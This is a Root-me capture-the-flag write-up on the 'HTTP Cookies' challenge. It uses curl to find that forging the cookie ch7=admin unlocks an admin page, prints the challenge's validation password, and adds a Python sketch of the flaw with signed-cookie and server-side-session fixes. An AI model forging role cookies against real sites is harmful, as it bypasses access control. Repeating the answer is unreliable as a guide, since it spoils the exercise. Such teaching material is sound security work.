Rootme HTTP Cookies
Bob created a script to gather users' emails…
So this challenge is about HTTP cookies. Let's request the challenge page with curl and dump the headers.
curl -I http://challenge01.root-me.org/web-serveur/ch7/
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:08:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
There's nothing useful in the headers. Let's look at the source code.
curl http://challenge01.root-me.org/web-serveur/ch7/
<br/>
<br/>
<fieldset>
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/></fieldset>
There's a comment SetCookie("ch7","visiteur"). I guess we'll need to pass ch7=visiteur as a cookie on ?c=visiteur to see the emails?
If we curl the URL with ?c=visiteur appended, we see the Set-Cookie header:
curl -i http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur;echo
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:16:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: ch7=visiteur
...
<form method="POST" action="" name="a">
Email<br/>
<input type="text" name="mail" size="20" class="post2" value=""><br/><br/>
<input type="submit" name="jsep4b" size="20" class="post2" value="send"><br/><br/>
</form><!--SetCookie("ch7","visiteur");--><a href="?c=visiteur">Saved email adresses</a><br/>You need to be admin</fieldset>
The cookie is set to visiteur, and there's a message at the end of the page saying we need to be admin. If the cookie decides who we "are", let's change it from visiteur to admin.
curl -i --cookie "ch7=admin" http://challenge01.root-me.org/web-serveur/ch7/?c=visiteur;echo
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Nov 2017 16:14:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
<div>Validation password : ml-SYMPA</div></fieldset>
And there it is.
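The flaw this challenge models is that the server reads the user's role straight out of a client-controlled cookie. As an added example (not code from this writeup or from the Root-me challenge itself), here is a Python sketch of that vulnerable pattern beside two server-side fixes: an HMAC-signed cookie whose tag the server verifies before trusting the role, and an opaque session identifier that is only a lookup key into server-side state. The cookie name ch7 and the roles visiteur/admin are taken from the page; SERVER_SECRET, the function names and the sample cookies are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# Constructed demo secret: in a real deployment this comes from server-side config
# and is never sent to the client.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"

ALLOWED_ROLES = {"visiteur", "admin"}


def _cookie_value(cookie_header: str, name: str = "ch7"):
    """Parse a raw Cookie header and return the named value, or None."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    return jar[name].value if name in jar else None


# --- Vulnerable pattern (what the challenge models) ----------------------------
def role_from_cookie_vulnerable(cookie_header: str) -> str:
    """Trusts the cookie verbatim: whoever edits ch7 chooses their own role."""
    value = _cookie_value(cookie_header)
    return value if value in ALLOWED_ROLES else "anonymous"


# --- Fix 1: signed cookie ------------------------------------------------------
def _tag(role: str) -> str:
    return hmac.new(SERVER_SECRET, role.encode(), hashlib.sha256).hexdigest()


def issue_signed_cookie(role: str) -> str:
    """Server issues 'ch7=<role>.<hmac-sha256 tag>'; the tag binds the role to the secret."""
    return f"ch7={role}.{_tag(role)}"


def role_from_cookie_signed(cookie_header: str) -> str:
    """Accepts the role only if its tag verifies; any edit to the role breaks the tag."""
    value = _cookie_value(cookie_header)
    if value is None:
        return "anonymous"
    role, sep, tag = value.rpartition(".")
    if not sep or role not in ALLOWED_ROLES:
        return "anonymous"
    # Constant-time comparison so the check does not leak tag bytes via timing.
    if not hmac.compare_digest(tag, _tag(role)):
        return "anonymous"  # forged or tampered cookie
    return role


# --- Fix 2: opaque server-side session -----------------------------------------
SESSIONS: dict = {}  # in-memory stand-in for a real session store


def issue_session_cookie(role: str) -> str:
    """The cookie carries only a random identifier; the role lives on the server."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"role": role}
    return f"ch7={sid}"


def role_from_session(cookie_header: str) -> str:
    sid = _cookie_value(cookie_header)
    return SESSIONS.get(sid, {}).get("role", "anonymous")


# --- Page logic mirroring the challenge's response ------------------------------
def saved_emails_page(role: str) -> str:
    """Returns the admin-only content or the same refusal the challenge prints."""
    if role == "admin":
        return "<constructed admin-only content>"
    return "You need to be admin"
```

With the vulnerable resolver, `ch7=admin` is enough to reach the admin page, which is exactly what the curl call above demonstrates; with either fix, a hand-edited `ch7=admin` resolves to anonymous because the server never derives authority from a value the client can write freely. The session approach is the usual choice because it also lets the server revoke sessions; the signed cookie avoids server-side state but must still be set with HttpOnly and Secure flags and is only as strong as the secrecy of SERVER_SECRET.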